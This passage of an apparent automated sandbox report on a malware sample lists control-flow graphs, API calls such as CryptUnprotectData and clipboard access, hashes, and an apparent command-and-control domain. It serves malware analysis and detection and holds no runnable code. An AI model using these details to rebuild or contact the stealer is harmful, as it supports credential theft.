415ba1-415bc5 call 43eaa0 185->191 192 415b83-415b8a 185->192 189 415b60-415b6f 186->189 188->188 193 41593e-41594e 188->193 189->185 189->189 191->179 206 415bf0 191->206 207 415bd2-415bd8 call 407ff0 191->207 208 415ca2-415ca8 call 407ff0 191->208 209 415c05-415c2d call 43edf0 191->209 210 415c34-415c61 call 407fe0 call 43eec0 191->210 211 415bf6 191->211 212 415c68-415c70 191->212 213 415bdb-415bdd 191->213 214 415cab-415cbf 191->214 215 415c7d-415c95 call 401000 191->215 216 415bfc-415c02 call 407ff0 191->216 194 415b90-415b9f 192->194 196 415971-415989 193->196 197 415950-415955 193->197 194->191 194->194 199 4159b1-4159c4 call 408c20 196->199 200 41598b-415992 196->200 198 415960-41596f 197->198 198->196 198->198 199->144 203 4159a0-4159af 200->203 205 416042-41607f call 407fe0 201->205 203->199 203->203 236 416080-4160b3 205->236 206->211 207->213 208->214 209->208 209->210 209->212 209->214 209->215 210->208 210->212 210->214 210->215 211->216 212->215 217 4194f7-4194fe 213->217 225 415cc0-415ce4 214->225 215->208 216->209 225->225 233 415ce6-415cee 225->233 237 415cf0-415cff 233->237 238 415d2a-415d85 call 401a90 233->238 236->236 241 4160b5-4160bd 236->241 242 415d00-415d07 237->242 251 415d90-415dc6 238->251 244 4160e1-4160f8 241->244 245 4160bf-4160c4 241->245 246 415d10-415d16 242->246 247 415d09-415d0c 242->247 248 416121-416137 call 408c20 244->248 249 4160fa-416101 244->249 252 4160d0-4160df 245->252 246->238 250 415d18-415d27 call 43bad0 246->250 247->242 253 415d0e 247->253 262 41613d-416143 call 407ff0 248->262 254 416110-41611f 249->254 250->238 251->251 257 415dc8-415dde call 401dd0 251->257 252->244 252->252 253->238 254->248 254->254 257->262 263 416165-4161ca 257->263 264 415de5-415de7 257->264 265 416146-41615f call 43d450 257->265 266 415fc9-415fd5 call 407ff0 257->266 267 415fda-415fe1 257->267 268 415fbc 257->268 262->265 273 4161d0-416202 263->273 271 415df0-415df6 264->271 265->263 266->263 274 415ff0-415ff8 267->274 268->266 271->271 277 415df8-415e0d 271->277 273->273 279 416204-41621e call 401dd0 273->279 274->274 280 415ffa-41601f 274->280 281 415e14 277->281 282 415e0f-415e12 277->282 279->217 279->262 279->263 279->265 279->266 279->267 279->268 280->201 284 416021-416026 280->284 286 415e15-415e2c 281->286 282->281 282->286 284->205 288 415e33 286->288 289 415e2e-415e31 286->289 290 415e34-415e58 call 407fe0 288->290 289->288 289->290 293 415f46-415fb5 call 43d450 CryptUnprotectData 290->293 294 415e5e-415e68 290->294 293->262 293->263 293->265 293->266 293->267 293->268 296 415e85-415ecb call 41d440 * 2 294->296 302 415e72-415e7f 296->302 303 415ecd-415ee0 call 41d440 296->303 302->293 302->296 306 415ee2-415f0e 303->306 307 415e6e 303->307 308 415f10-415f25 call 41d440 306->308 309 415f3d-415f41 306->309 307->302 312 415f2b-415f38 308->312 313 415e6a 308->313 309->302 312->313 313->307
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: >j%h$Fi$JHN]$UR$YU]&$s|}$wq
                                                            • API String ID: 0-2664314784
                                                            • Opcode ID: 744f5921334badd97250c1c299283197a61e04fc11c6ff6aa40322fb847e4306
                                                            • Instruction ID: 6413b6cc339066a55532578e80e6a8cd990dac4ee94ef104ad543d9b904f88e5
                                                            • Opcode Fuzzy Hash: 744f5921334badd97250c1c299283197a61e04fc11c6ff6aa40322fb847e4306
                                                            • Instruction Fuzzy Hash: 2E5224B5908740CBD7249F29D8527EFB7E1EFD5314F188A2EE48987391EB389841CB46

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 633 408720-408731 call 43b340 636 408a15-408a17 ExitProcess 633->636 637 408737-40873e call 433fb0 633->637 640 408744-408768 GetCurrentProcessId GetCurrentThreadId 637->640 641 4089fe-408a05 637->641 642 40876a-40876c 640->642 643 40876e-408853 SHGetSpecialFolderPathW 640->643 644 408a10 call 43ba50 641->644 645 408a07-408a0d call 407ff0 641->645 642->643 648 408860-4088dd 643->648 644->636 645->644 648->648 649 4088df-40891f call 43a080 648->649 653 408920-40895b 649->653 654 408994-4089a9 GetForegroundWindow 653->654 655 40895d-408992 653->655 656 4089da-4089f2 call 409be0 654->656 657 4089ab-4089d8 654->657 655->653 656->641 660 4089f4 call 40c900 656->660 657->656 662 4089f9 call 40b820 660->662 662->641
                                                            APIs
                                                            • GetCurrentProcessId.KERNEL32 ref: 00408744
                                                            • GetCurrentThreadId.KERNEL32 ref: 0040874E
                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408808
                                                            • GetForegroundWindow.USER32 ref: 004089A1
                                                            • ExitProcess.KERNEL32 ref: 00408A17
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                            • String ID:
                                                            • API String ID: 4063528623-0
                                                            • Opcode ID: 18fe486032edb0969c4fe46b9c72ea22f78cc782d11755b5447650c5aff50698
                                                            • Instruction ID: 59a09f4aa6f0f146742c4b312151e509a05fd4ea0b744ce26f1448cff0f88d73
                                                            • Opcode Fuzzy Hash: 18fe486032edb0969c4fe46b9c72ea22f78cc782d11755b5447650c5aff50698
                                                            • Instruction Fuzzy Hash: E57168B3E043144BC318EF69DC4135AB6C79BC0714F1F813EA984EB3A5DE799C02869A

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 664 42bf45-42bf5f 665 42bf60-42bf7e 664->665 665->665 666 42bf80-42bf87 665->666 667 42bf9b-42c2b8 666->667 668 42bf89-42bf8f 666->668 671 42c2c0-42c2d4 667->671 669 42bf90-42bf99 668->669 669->667 669->669 671->671 672 42c2d6-42c2dd 671->672 673 42c2fb-42c307 672->673 674 42c2df-42c2e3 672->674 675 42c321-42c33f call 43d450 673->675 676 42c309-42c30b 673->676 677 42c2f0-42c2f9 674->677 681 42c344-42c36f GetPhysicallyInstalledSystemMemory 675->681 678 42c310-42c31d 676->678 677->673 677->677 678->678 680 42c31f 678->680 680->675 682 42c370-42c38a 681->682 682->682 683 42c38c-42c3c2 call 41dfc0 682->683 686 42c3d0-42c401 683->686 686->686 687 42c403-42c40a 686->687 688 42c41b-42c423 687->688 689 42c40c 687->689 690 42c425-42c426 688->690 691 42c43b-42c448 688->691 692 42c410-42c419 689->692 693 42c430-42c439 690->693 694 42c44a-42c451 691->694 695 42c46b-42c4ba 691->695 692->688 692->692 693->691 693->693 696 42c460-42c469 694->696 697 42c4c0-42c4f7 695->697 696->695 696->696 697->697 698 42c4f9-42c500 697->698 699 42c502-42c506 698->699 700 42c51b-42c528 698->700 701 42c510-42c519 699->701 702 42c52a-42c531 700->702 703 42c54b-42c5ea 700->703 701->700 701->701 704 42c540-42c549 702->704 704->703 704->704
                                                            APIs
                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C34C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: InstalledMemoryPhysicallySystem
                                                            • String ID: @a$L,2H$u
                                                            • API String ID: 3960555810-2528062038
                                                            • Opcode ID: 19d08f9f7d7bed7b51ea453a9ddedc70aa30b931c2df07c4920a08e0e96f246b
                                                            • Instruction ID: 260f7405a81d4791661634af8caf9a7863cff9be19d6ba05b95630b53f05b8d3
                                                            • Opcode Fuzzy Hash: 19d08f9f7d7bed7b51ea453a9ddedc70aa30b931c2df07c4920a08e0e96f246b
                                                            • Instruction Fuzzy Hash: 5B91D37050C3D08FD729CF3994A07ABBBD1AFA7308F58499ED4C997282D7398506CB5A

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 705 40d35c-40d38f call 409710 CoUninitialize 708 40d390-40d3c8 705->708 708->708 709 40d3ca-40d3e8 708->709 710 40d3f0-40d453 709->710 710->710 711 40d455-40d4b5 710->711 712 40d4c0-40d4e7 711->712 712->712 713 40d4e9-40d4fa 712->713 714 40d51b-40d523 713->714 715 40d4fc-40d50a 713->715 717 40d525-40d52a 714->717 718 40d53d 714->718 716 40d510-40d519 715->716 716->714 716->716 720 40d530-40d539 717->720 719 40d541-40d54e 718->719 722 40d550-40d557 719->722 723 40d56b-40d573 719->723 720->720 721 40d53b 720->721 721->719 724 40d560-40d569 722->724 725 40d575-40d576 723->725 726 40d58b-40d595 723->726 724->723 724->724 727 40d580-40d589 725->727 728 40d597-40d59b 726->728 729 40d5ab-40d5b7 726->729 727->726 727->727 730 40d5a0-40d5a9 728->730 731 40d5d1-40d6f9 729->731 732 40d5b9-40d5bb 729->732 730->729 730->730 733 40d700-40d718 731->733 734 40d5c0-40d5cd 732->734 733->733 735 40d71a-40d73f 733->735 734->734 736 40d5cf 734->736 737 40d740-40d760 735->737 736->731 737->737 738 40d762-40d7c8 call 40b850 call 409710 CoUninitialize 737->738 743 40d7d0-40d808 738->743 743->743 744 40d80a-40d828 743->744 745 40d830-40d893 744->745 745->745 746 40d895-40d8f5 745->746 747 40d900-40d927 746->747 747->747 748 40d929-40d93a 747->748 749 40d95b-40d963 748->749 750 40d93c-40d94a 748->750 751 40d965-40d96a 749->751 752 40d97d 749->752 753 40d950-40d959 750->753 754 40d970-40d979 751->754 755 40d981-40d98e 752->755 753->749 753->753 754->754 756 40d97b 754->756 757 40d990-40d997 755->757 758 40d9ab-40d9b3 755->758 756->755 759 40d9a0-40d9a9 757->759 760 40d9b5-40d9b6 758->760 761 40d9cb-40d9d5 758->761 759->758 759->759 762 40d9c0-40d9c9 760->762 763 40d9d7-40d9db 761->763 764 40d9eb-40d9f7 761->764 762->761 762->762 765 40d9e0-40d9e9 763->765 766 40da11-40db45 764->766 767 40d9f9-40d9fb 764->767 765->764 765->765 769 40db50-40db6a 766->769 768 40da00-40da0d 767->768 768->768 770 40da0f 768->770 769->769 771 40db6c-40db8b 769->771 770->766 772 40db90-40dbb0 771->772 772->772 773 40dbb2-40dbfe call 40b850 772->773
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: Uninitialize
                                                            • String ID: (P$noisercluch.click
                                                            • API String ID: 3861434553-1665479885
                                                            • Opcode ID: 806ca7b758aea85ba4256f5737dc198644c562e8fe769678b1b4da1df31b6c3a
                                                            • Instruction ID: 25c0ec8a4ed120f5396a3a8eb6bdccd7f9d1ac3417b5368b8856c91530714b40
                                                            • Opcode Fuzzy Hash: 806ca7b758aea85ba4256f5737dc198644c562e8fe769678b1b4da1df31b6c3a
                                                            • Instruction Fuzzy Hash: 9522F37194D3C18AD335CF39D49079BBFE0AF96304F188AADC4D96B282D739450ACB96

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 776 42c289-42c2b8 call 431950 call 407ff0 782 42c2c0-42c2d4 776->782 782->782 783 42c2d6-42c2dd 782->783 784 42c2fb-42c307 783->784 785 42c2df-42c2e3 783->785 786 42c321-42c36f call 43d450 GetPhysicallyInstalledSystemMemory 784->786 787 42c309-42c30b 784->787 788 42c2f0-42c2f9 785->788 793 42c370-42c38a 786->793 789 42c310-42c31d 787->789 788->784 788->788 789->789 791 42c31f 789->791 791->786 793->793 794 42c38c-42c3c2 call 41dfc0 793->794 797 42c3d0-42c401 794->797 797->797 798 42c403-42c40a 797->798 799 42c41b-42c423 798->799 800 42c40c 798->800 801 42c425-42c426 799->801 802 42c43b-42c448 799->802 803 42c410-42c419 800->803 804 42c430-42c439 801->804 805 42c44a-42c451 802->805 806 42c46b-42c4ba 802->806 803->799 803->803 804->802 804->804 807 42c460-42c469 805->807 808 42c4c0-42c4f7 806->808 807->806 807->807 808->808 809 42c4f9-42c500 808->809 810 42c502-42c506 809->810 811 42c51b-42c528 809->811 812 42c510-42c519 810->812 813 42c52a-42c531 811->813 814 42c54b-42c5ea 811->814 812->811 812->812 815 42c540-42c549 813->815 815->814 815->815
                                                            APIs
                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042C34C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: InstalledMemoryPhysicallySystem
                                                            • String ID: @a$u
                                                            • API String ID: 3960555810-583156259
                                                            • Opcode ID: d3dcd12708497a123305e223026c5427f1c8ff29cf19f116bf7101b30c51974c
                                                            • Instruction ID: fbcac5f05e551be09428fe54d577bd2475c49f62c0f93ee7e958261cddcd3d67
                                                            • Opcode Fuzzy Hash: d3dcd12708497a123305e223026c5427f1c8ff29cf19f116bf7101b30c51974c
                                                            • Instruction Fuzzy Hash: 4E81147050C3D08BD329CF3994A07ABBBD1AF97304F5849AED4C997382DB798506CB5A
                                                            APIs
                                                            • LdrInitializeThunk.NTDLL(0043EA7B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043BAFE
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                            • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                            • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                            • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 864 42f37a-42f3cb 865 42f3ce-42f3d1 864->865 866 42f3d3-42f41c 865->866 867 42f41e-42f63a SysAllocString 865->867 866->865 868 42f63c-42f63f 867->868 869 42f641-42f677 868->869 870 42f679-42f6c0 868->870 869->868 872 42f6ca-42f6f0 870->872
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: AllocString
                                                            • String ID: 0
                                                            • API String ID: 2525500382-4108050209
                                                            • Opcode ID: 8da7bf490a034171e3dce45de74038d4641a0d6d0dca22c35aceb32db23d8fd3
                                                            • Instruction ID: a1bca001c7a4cafc18474ec3c09c662e33e11ff26cf3423f3d2483c3ce0ae8c6
                                                            • Opcode Fuzzy Hash: 8da7bf490a034171e3dce45de74038d4641a0d6d0dca22c35aceb32db23d8fd3
                                                            • Instruction Fuzzy Hash: F1A1AE70108FC28AD332C63C88587D7BFD15BA7324F484BADD0FA4A3E6D6A52146C766

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 873 43165c-431685 874 431687-43168a 873->874 875 4316ed-431801 SysAllocString 874->875 876 43168c-4316eb 874->876 877 431804-431807 875->877 876->874 878 431833-431870 877->878 879 431809-431831 877->879 881 43187a-4318a6 878->881 879->877
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: AllocString
                                                            • String ID: 0
                                                            • API String ID: 2525500382-4108050209
                                                            • Opcode ID: 25ab0af81ca39a2f35250ae81ccfa8cb2cc541f9024661974fe6062f9beea9ae
                                                            • Instruction ID: 0bc001b784ff9219c14a20724f0671f28d23ae2ac33e4cc183003bbe73fc1bcb
                                                            • Opcode Fuzzy Hash: 25ab0af81ca39a2f35250ae81ccfa8cb2cc541f9024661974fe6062f9beea9ae
                                                            • Instruction Fuzzy Hash: 38812460108BC1CED366CB3C8888A067F922B6B224F1E87D9D1E94F7F3C665D506C766

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 882 42f787-42f8c2 SysFreeString 883 42f8c4-42f8c7 882->883 884 42f8e0-42f924 883->884 885 42f8c9-42f8de 883->885 887 42f92e-42f95c 884->887 885->883
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: FreeString
                                                            • String ID: 0
                                                            • API String ID: 3341692771-4108050209
                                                            • Opcode ID: 380e84ca371044cea28e8452650673017fa369a6050c559cfbf2dc47d4d33812
                                                            • Instruction ID: bde3fda008fae2ddbf337259ae56ab0a534ac6309ad685f2f7a7d6aa015b5799
                                                            • Opcode Fuzzy Hash: 380e84ca371044cea28e8452650673017fa369a6050c559cfbf2dc47d4d33812
                                                            • Instruction Fuzzy Hash: B1718850108FC1C9D372CB3C8548607BFE16B67224F484B9DD1E64BBE6D3AAB509C76A
                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNELBASE ref: 00435C00
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: DefaultLanguageUser
                                                            • String ID:
                                                            • API String ID: 95929093-0
                                                            • Opcode ID: 1f3a4874fe6a934c83db0129cb2c4f35d243ae89896cc335940cfab8c0206f25
                                                            • Instruction ID: d529aa2c6436962cd02f9ff259ed32c9c8aa20a75f7e6bd79d554a5377992a07
                                                            • Opcode Fuzzy Hash: 1f3a4874fe6a934c83db0129cb2c4f35d243ae89896cc335940cfab8c0206f25
                                                            • Instruction Fuzzy Hash: 4801D2358043A58FCF118F7898442EE7FA16F1A314F18469DC8D567396D739AA01CB96
                                                            APIs
                                                            • RtlReAllocateHeap.NTDLL(?,00000000,004377BF,00000000,00004000,00000000,004377BF,00000000,00004000), ref: 0043BAA2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: f12a0d30cc2367c78ba08f1fd21fcf34805736e507490131006d9ced82152e8a
                                                            • Instruction ID: be575660327ce48efbff70f1a81ba6d67653373a4ecd42db05ccb867a55137c7
                                                            • Opcode Fuzzy Hash: f12a0d30cc2367c78ba08f1fd21fcf34805736e507490131006d9ced82152e8a
                                                            • Instruction Fuzzy Hash: CBE02B36418311BBC2152F347D05B173A78DFCA734F050836F40192111DB38E81281EF
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: BlanketProxy
                                                            • String ID:
                                                            • API String ID: 3890896728-0
                                                            • Opcode ID: 0f3a594d24f492ad421ea8460d4e17b4e5aba94734245f3cc342df4c7054f90f
                                                            • Instruction ID: 4e2864844023ea26aa9e2ee02480731ef327d8f3645c39fc8e2c289bfba3a2ea
                                                            • Opcode Fuzzy Hash: 0f3a594d24f492ad421ea8460d4e17b4e5aba94734245f3cc342df4c7054f90f
                                                            • Instruction Fuzzy Hash: CCF070B4509701CFE314DF28D5A8B1ABBF0FB89304F11891CE4958B3A1CB75A549CF82
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: BlanketProxy
                                                            • String ID:
                                                            • API String ID: 3890896728-0
                                                            • Opcode ID: d0d004b74e83634fe9f7cd80248a028dc92d7887ef778d010a08205c6b6403e5
                                                            • Instruction ID: f402ad757b55e4d436691d2150176b8ee0a7d87fd75628386497c25852c9749b
                                                            • Opcode Fuzzy Hash: d0d004b74e83634fe9f7cd80248a028dc92d7887ef778d010a08205c6b6403e5
                                                            • Instruction Fuzzy Hash: 69F017B55483028FE301CF24C55835BBBE1BBC5308F15892CE0A44B354C7B5A5498FC2
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 0043BCA2
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: ForegroundWindow
                                                            • String ID:
                                                            • API String ID: 2020703349-0
                                                            • Opcode ID: de7ba2978205d3e5dac454b169e1469a028ee3eec04f5a814a46a1d3adc94483
                                                            • Instruction ID: 34fc1b220f50a438f75fecb060dcf8b9689bf8e5ef46e1e0de830b6ef63ced86
                                                            • Opcode Fuzzy Hash: de7ba2978205d3e5dac454b169e1469a028ee3eec04f5a814a46a1d3adc94483
                                                            • Instruction Fuzzy Hash: DBE04FB9E019459FCB48CF29FC504B977A2E759314704547DE503C7761DB389906CB08
                                                            APIs
                                                            • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C913
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: Initialize
                                                            • String ID:
                                                            • API String ID: 2538663250-0
                                                            • Opcode ID: 848936b2f6a1009ae71585b31087a1977fcf0e71369a6819067518d21a73774f
                                                            • Instruction ID: 600c1c55f4c47978a808d38d6d603c7baf665e00bbb4b934b296b6fd480c4591
                                                            • Opcode Fuzzy Hash: 848936b2f6a1009ae71585b31087a1977fcf0e71369a6819067518d21a73774f
                                                            • Instruction Fuzzy Hash: D5D02E21A140842BC608AB2CDC06F2736A8C703B92F000238A293C62D2E8007A00C169
                                                            APIs
                                                            • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040C947
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: InitializeSecurity
                                                            • String ID:
                                                            • API String ID: 640775948-0
                                                            • Opcode ID: 921506b26635a132b4df4f2ddd7b465313c55da5b78467d40561622a9134298f
                                                            • Instruction ID: fd192ded0c0cb464a206ce1d3467658bba8c5c20ae5ff3727e68ffbe475560a4
                                                            • Opcode Fuzzy Hash: 921506b26635a132b4df4f2ddd7b465313c55da5b78467d40561622a9134298f
                                                            • Instruction Fuzzy Hash: 8AD0C9787D83807AF1648B18EC17F203210AB02F66F340228B363FE2E2CAD07201860C
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(?,00000000,00000000,00413147), ref: 0043A0C0
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 7e4a886f44f579dff80980d892cb73d2b56cb90909c1320e76daed750195b038
                                                            • Instruction ID: 91785600a9bb6ba1e718d507953919cb8ba152ebb43f2213e550c9c7e00cfb49
                                                            • Opcode Fuzzy Hash: 7e4a886f44f579dff80980d892cb73d2b56cb90909c1320e76daed750195b038
                                                            • Instruction Fuzzy Hash: E6D0C931459222EBC6642F28BC05BCB3A68DF49721F0748A1B8046A075CB25DC92DAD8
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem
                                                            • String ID: $($C$5"C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$O$C$_(C$i*C
                                                            • API String ID: 4116985748-3372999186
                                                            • Opcode ID: 8e9cdeb4bfab84274a9669cd475aa5743967b19e075009f034f97172db1c8e9c
                                                            • Instruction ID: 8d029f29b9a4e16f053ed14b1b3047fa4adeb45d898568eba0a28193ac899bff
                                                            • Opcode Fuzzy Hash: 8e9cdeb4bfab84274a9669cd475aa5743967b19e075009f034f97172db1c8e9c
                                                            • Instruction Fuzzy Hash: EEA16BB041C7818BE770DF18C448B9BBBE0BBC6308F51892ED5989B651C7B99848CF87
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.2883826639.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.2883826639.0000000000451000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_powershell.jbxd
                                                            Similarity
                                                            • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                            • String ID:
                                                            • API String ID: 2832541153-0
                                                            • Opcode ID: 5502842d010c68d0be0a87ba9bd2940b424877ada9b18a2ce83abf0bf6e0d2fd
                                                            • Instruction ID: 456b1e1cfcf1951664547b6acc2f3bc49ddc4e535775eb3306363a95376e0e20
